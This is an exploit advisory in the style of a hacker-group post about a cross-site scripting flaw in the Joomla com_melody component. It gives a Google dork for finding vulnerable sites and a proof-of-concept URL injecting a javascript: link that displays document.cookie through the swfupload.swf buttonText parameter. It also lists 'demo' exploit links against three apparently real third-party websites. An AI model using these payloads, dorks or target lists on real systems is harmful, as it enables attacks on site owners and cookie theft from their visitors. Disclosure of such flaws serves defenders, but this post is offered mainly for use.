[+] Author: TUNISIAN CYBER
[+] Exploit Title: Joomla Component com_melody XSS Vulnerability
[+] Date: 09-01-2014
[+] Category: WebApp
[+] Google Dork: :inurl:"components/com_melody/"
[+] Tested on: KaliLinux
[+} Friend's blog: www.na3il.com

########################################################################################
+Exploit:
The Joomla melody component suffers from an xss vulnerability.
+P.O.C:
127.0.0.1/[PATH]/components/com_melody/assets/swfupload/swfupload.swf?buttonText=<a href='javascript:alert(document.cookie)'>XSS</a>

Demo:
http://www.lachost.net/choir/components/com_melody/assets/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert%28document.cookie%29%27%3EXSS%3C/a%3E
http://nettlys.no/components/com_melody/assets/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert%28document.cookie%29%27%3EXSS%3C/a%3E
godsstream.com/~domain20/components/com_melody/assets/swfupload/swfupload.swf?buttonText=<a href='javascript:alert(1)'>XSS</a>

./3nD
########################################################################################
Greets to: XMaX-tn, N43il HacK3r, XtechSEt
Sec4Ever Members:
DamaneDz
UzunDz
GEOIX
########################################################################################